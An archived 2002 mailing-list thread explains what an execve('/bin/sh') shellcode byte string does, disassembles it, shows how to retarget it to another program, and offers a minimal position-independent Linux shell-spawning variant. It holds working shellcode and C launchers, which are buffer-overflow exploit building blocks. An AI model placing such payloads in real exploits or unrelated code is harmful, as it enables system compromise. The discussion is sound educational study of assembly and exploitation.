shellcode

shellcode

[xlp]

hi, i am reading a doc about buffer overflow, and i have some questions, check
+this c code:
char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80";
int main() {
        void (*s)()=(void *)bsdshell;
        s();
}
If i run it, it executes a shell. I'd like to know in what does bsdshell
+contain?, What is it? hexadacimal? how can i get that?, acording to the doc,
+it's the execve for /bin/sh.

Re: shellcode

[Scott Lanning]

On Mon, 24 Jun 2002, xlp wrote:
> hi, i am reading a doc about buffer overflow, and i have some questions,
> check this c code:
> char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
>                   "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
>                   "\xb0\x3b\x50\xcd\x80";
> int main() {
>         void (*s)()=(void *)bsdshell;
>         s();
> }
> If i run it, it executes a shell. I'd like to know in what does bsdshell
> +contain?, What is it? hexadacimal? how can i get that?, acording to the
> doc, it's the execve for /bin/sh.

Yes, hexadecimal. For example, "\xcd\x80" at the end is "int 0x80".
The numbers are machine code run by the processor.
Here are some more tutorials: http://julianor.tripod.com/bufo.html

Re: shellcode

[Stephan Walter]

This is my 5-minute analyzing:

$ echo -n \
$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\
x50\x54\x53\xb0\x3b\x50\xcd\x80' >> shell.asm

$ ndisasm -u shell.asm

00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f   ; "//sh"
00000008  682F62696E        push dword 0x6e69622f   ; "/bin" 
						    ; -> execute /bin/sh
0000000D  89E3              mov ebx,esp   ; ebx points to the string
0000000F  50                push eax      
00000010  53                push ebx
00000011  50                push eax
00000012  54                push esp
00000013  53                push ebx
00000014  B03B              mov al,0x3b   ; 0x3b = SYS_execve
00000016  50                push eax
00000017  CD80              int 0x80      ; system call "execve"
					  ; -> execute the shell


Regards,
Stephan

Re: shellcode

[Stephan Walter]

On Tue, 25 Jun 2002 14:46:51 -0500, xlp <xlp@emtel.net.co> wrote:
> Stephan, it's so complicated, i dont get it, what's objdump for?
> if a buffer is char [10], how is the sfp, ret and shellcode length?

objdump? Why would you want to use that? See "man objdump".

Let's have a look at your code:

char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80";
 int main() {
         void (*s)()=(void *)bsdshell;
         s();
 }

"bsdshell" is an array of char which contains the assembly code. It is 
25 bytes long, but you could make it smaller by optimizing the code.
If you disassemble these bytes, it looks like this:

   xor eax,eax
   push eax
   push dword 0x68732f2f
   push dword 0x6e69622f
   mov ebx,esp
   push eax      
   push ebx
   push eax
   push esp
   push ebx
   mov al,0x3b
   push eax
   int 0x80

The important thing is that it uses "int 0x80" (last line). This
interrupt is used to tell the kernel to do something. In this case, it
is the system call named "execve", which means that the kernel should
execute a program. 

The function "s" is a pointer of type void to bsdshell. On the next line
you execute this "s". It is not a C function, just some lonely bytes in
the memory. But your CPU jumps to this code just as it was a C function,
and now the code listed above gets executed.

What do you mean with sfp and ret? If you mean the ret (return) command,
the answer's short: there is no return. If you type "exit" in the shell,
your program will crash.

I don't know if this answers your questions. Just write to the mailing
list if you have trouble understanding this

Regards,
Stephan

Re: shellcode

[Stephan Walter]

Please write to the list. Others may also be interested in this. (Or
they may be able to give better answers than mine)

On Tue, 25 Jun 2002 16:14:01 -0500, xlp <xlp@emtel.net.co> wrote:

> hi, let's say i dont want to run /bin/sh, i want to run
> /usr/bin/uptime, How can i get all that functions in hexadecimal?

like this (no guarantee, I haven't tested this):

--------------- snip ----
BITS 32
    xor eax,eax
    push eax
    push "time"
    push "//up"
    push "/bin"
    push "/usr"    ; you have to push the program name like this
    mov ebx,esp
    push eax
    push ebx
    push eax
    push esp
    push ebx
    mov al,0x3b
    push eax
    int 0x80
--------------- snap ---
use "nasm -f bin -o test.bin test.asm" to compile it.

I compiled it for you:

0000000 31 c0 50 68 74 69 6d 65 68 2f 2f 75 70 68 2f 62
0000020 69 6e 68 2f 75 73 72 89 e3 50 53 50 54 53 b0 3b
0000040 50 cd 80

of course you'll have to remove the offset adresses and insert the
backslashes.

or use this snippet:
if you want to change the program, just change the 4 lines (read bottom
to top). but make shure that every string is exactly 4 bytes long and
add "\x68" between them.

char bsdshell[] =        "\x31\xc0\x50\x68"
                  "time"
                         "\x68"
                  "//up"
                         "\x68"
                  "/bin"
                         "\x68"
                  "/usr"
                         "\x89\xe3\x50\x53\x50\x54\x53"
                         "\xb0\x3b\x50\xcd\x80";


> why 25 bytes long?
> %cat 1.c ; cc 1.c ; ./a.out
> main(){
>         char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
>                   "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
>                   "\xb0\x3b\x50\xcd\x80";
>         printf("%d\n", sizeof(bsdshell));
> }
> 26

that's right, it is 26 bytes long, but the last byte is a zero-byte
("end of string") and isn't used for the code.

Re: shellcode

[Brian Raiter]

This thread has been about invoking a shell under BSD, which one would
imagine would be a bit off topic for the linux-assembly mailing list.
So, in order to remedy this ...

A few years ago a friend challenged me to come up with the smallest
possible code to invoke a shell under Linux. The only constraint he
placed was that the code had to be position-independent. Rummaging
through some old notes, I dug out the results of my efforts, which was
the following code (NASM syntax):

00000000 6A0B                   push    byte 11
00000002 E809000000             call    $ + 14
00000007 002F62696E2F736800     db      0, '/bin/sh', 0
00000010 5B                     pop     ebx
00000011 58                     pop     eax
00000012 99                     cdq
00000013 43                     inc     ebx
00000014 8D4BF8                 lea     ecx, [byte ebx - 8]
00000017 8919                   mov     [ecx], ebx
00000019 CD80                   int     0x80

Or, as it might appear inside an exploit:

    char sh[] = "j\v\350\t\0\0\0\0/bin/sh\0[X\231C\215K\370\211\031\315\200";
    (*(void(*)(void))sh)();

Note that the program needs to be in writeable memory; thus it needs
to be invoked from a variable and not a direct string literal.

(Unfortunately, it looks like my program is 27 bytes in size, leaving
it slightly longer than the BSD version.)

b